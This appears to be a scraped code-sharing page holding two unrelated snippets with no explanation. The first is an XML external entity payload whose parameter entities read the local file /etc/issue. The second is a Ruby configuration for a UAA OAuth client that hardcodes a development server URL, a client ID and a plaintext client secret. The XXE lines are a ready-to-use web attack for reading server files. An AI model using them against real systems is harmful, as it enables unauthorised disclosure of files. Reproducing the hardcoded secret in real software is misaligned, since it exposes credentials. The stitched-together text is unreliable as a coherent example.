This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % payload SYSTEM "file:///etc/issue"> | |
<!ENTITY % intern "<!ENTITY % trick SYSTEM 'file:///etc/issue'>"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'uaa' | |
# the URL of the UAA | |
UAA_TARGET = "https://uaa.cf102.dev.las01.vcsops.com" | |
# UAA Client Application Registration info | |
CLIENT_ID = "app" # the name registered with the UAA for this app | |
CLIENT_SECRET = "appclientsecret" # the app registration code | |
SCOPE = "dashboard.user openid" # this app will ask users to delegate authorization for these scopes | |
REDIR_URI = nil # as registered with the UAA. Specify a value here to override the default of http://host:port/CALLBACK_PATH |